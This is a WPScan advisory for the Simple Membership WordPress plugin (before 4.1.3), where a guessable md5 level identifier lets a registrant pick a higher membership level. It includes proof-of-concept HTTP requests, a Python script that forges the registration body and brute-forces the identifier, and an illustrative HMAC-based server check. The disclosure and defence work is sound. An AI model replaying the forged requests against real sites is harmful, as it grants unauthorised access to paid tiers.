WPScan (wpvulndb) WPVDB-ID: 77B7CA19-294C-4480-8F57-6FDDFC67FFFB
Published: Jul 06, 2022

Simple Membership < 4.1.3 - Unauthenticated Membership Privilege Escalation

Source: wpscan.com

EPSS: 0.003 (Low), percentile 68.8%

The plugin allows a user to choose their own membership level at the registration stage, because a user-supplied parameter (level_identifier) is not sufficiently checked. Note: this affects only the plugin's membership level, not the WordPress role.

PoC

The registration request carries a level_identifier parameter whose value is md5(2), where 2 is the default membership level; during registration the value is c81e728d9d4c2f636f067f89cc14862c. An attacker can replace this value with the md5 of another level ID and obtain that membership level.

Original request:

    POST /membership-join/membership-registration/ HTTP/1.1
    Host: wordpress.local
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 281
    Origin: http://wordpress.local
    Connection: close
    Referer: http://wordpress.local/membership-join/membership-registration/
    Cookie: swpm_session=aa21a306ba6e73498ee136da0d751b47; swpm_in_use=swpm_in_use
    Upgrade-Insecure-Requests: 1

    level_identifier=c81e728d9d4c2f636f067f89cc14862c&user_name=user_low3&email=user_low3%40jet.local&password=user&password_re=user&first_name=user&last_name=user&membership_level=2&swpm_level_hash=947098d78fd5617082ca190a28c163b0&swpm_registration_submit=Register&action=custom_posts

Modified request, with which the attacker obtains the third level (level_identifier changed to md5(3) = eccbc87e4b5ce2fe28308fd9f2a7baf3):

    POST /membership-join/membership-registration/ HTTP/1.1
    Host: wordpress.local
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 281
    Origin: http://wordpress.local
    Connection: close
    Referer: http://wordpress.local/membership-join/membership-registration/
    Cookie: swpm_session=aa21a306ba6e73498ee136da0d751b47; swpm_in_use=swpm_in_use
    Upgrade-Insecure-Requests: 1

    level_identifier=eccbc87e4b5ce2fe28308fd9f2a7baf3&user_name=user_low3&email=user_low3%40domain.local&password=userpass&password_re=userpass&first_name=user&last_name=user&membership_level=2&swpm_level_hash=947098d78fd5617082ca190a28c163b0&swpm_registration_submit=Register&action=custom_posts
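The manipulation shown in the PoC, as an added example that is not part of the advisory or of the plugin's own code: a Python script that computes md5(level) for any level ID, rewrites a captured registration body the way the modified request does, and shows that the identifier can be inverted by trying small integers. Note that swpm_level_hash and membership_level are identical in both requests above, so in this PoC neither binds the level identifier. The second half is an illustrative server-side check (an assumption about a sound design, not the fix actually shipped in 4.1.3): the identifier is an HMAC under a server-held key, and the server grants only a level the registration page actually offers, ignoring the client's membership_level field. The request body, user details and the secret are constructed placeholders.

```python
import hashlib
import hmac
from typing import Iterable, Optional
from urllib.parse import parse_qs, urlencode

# Constructed sample body mirroring the fields of the advisory's PoC request.
# User name, e-mail and password are placeholders, not real accounts.
ORIGINAL_BODY = (
    "level_identifier=c81e728d9d4c2f636f067f89cc14862c"
    "&user_name=user_low3&email=user_low3%40domain.local"
    "&password=userpass&password_re=userpass"
    "&first_name=user&last_name=user&membership_level=2"
    "&swpm_level_hash=947098d78fd5617082ca190a28c163b0"
    "&swpm_registration_submit=Register&action=custom_posts"
)


def level_identifier(level_id: int) -> str:
    """Identifier as the PoC shows it: md5 of the decimal level ID.

    Nothing secret goes in, so anyone can compute it for any level.
    """
    return hashlib.md5(str(level_id).encode()).hexdigest()


def tamper_level(body: str, target_level: int) -> str:
    """Rewrite a captured registration body so it requests target_level.

    Only level_identifier is changed; membership_level and swpm_level_hash
    are left as captured, exactly as in the advisory's modified request.
    """
    fields = parse_qs(body, keep_blank_values=True)
    fields["level_identifier"] = [level_identifier(target_level)]
    return urlencode({k: v[0] for k, v in fields.items()})


def recover_level(identifier: str, max_level: int = 1000) -> Optional[int]:
    """Invert an md5 level identifier by trying small integer IDs.

    Shows why md5(id) gives no protection: the input space is tiny.
    """
    for lid in range(1, max_level + 1):
        if level_identifier(lid) == identifier:
            return lid
    return None


# --- Hardened check (illustrative; not the plugin's actual fix) -------------

# Constructed server-side secret; a real deployment would generate and store
# this securely rather than hard-code it.
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"


def keyed_level_identifier(level_id: int) -> str:
    """HMAC-SHA256 over the level ID with a server-held key.

    A client cannot forge this for a level it was not offered, unlike md5(id).
    """
    return hmac.new(SERVER_SECRET, str(level_id).encode(), hashlib.sha256).hexdigest()


def validate_registration(body: str, offered_levels: Iterable[int]) -> Optional[int]:
    """Return the level to grant, or None if the supplied identifier is not
    one the server issued for a level this registration page offers.

    The client's membership_level field is deliberately ignored: the granted
    level is derived only from the verified identifier.
    """
    fields = parse_qs(body, keep_blank_values=True)
    supplied = fields.get("level_identifier", [""])[0]
    for lid in offered_levels:
        if hmac.compare_digest(keyed_level_identifier(lid), supplied):
            return lid
    return None


if __name__ == "__main__":
    forged = tamper_level(ORIGINAL_BODY, 3)
    print("forged body:", forged)
    print("level behind captured identifier:",
          recover_level("c81e728d9d4c2f636f067f89cc14862c"))
    print("hardened check on forged body:", validate_registration(forged, [2]))
    honest = "level_identifier=" + keyed_level_identifier(2) + "&membership_level=3"
    print("hardened check on server-issued identifier:", validate_registration(honest, [2]))
```

Running the script prints the forged body with level_identifier set to md5(3), recovers level 2 from the captured identifier, and shows the keyed check rejecting the forged body while accepting a server-issued identifier even when the client claims a different membership_level.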

Affected software (CPE name, operator, version):
    simple-membership < 4.1.3
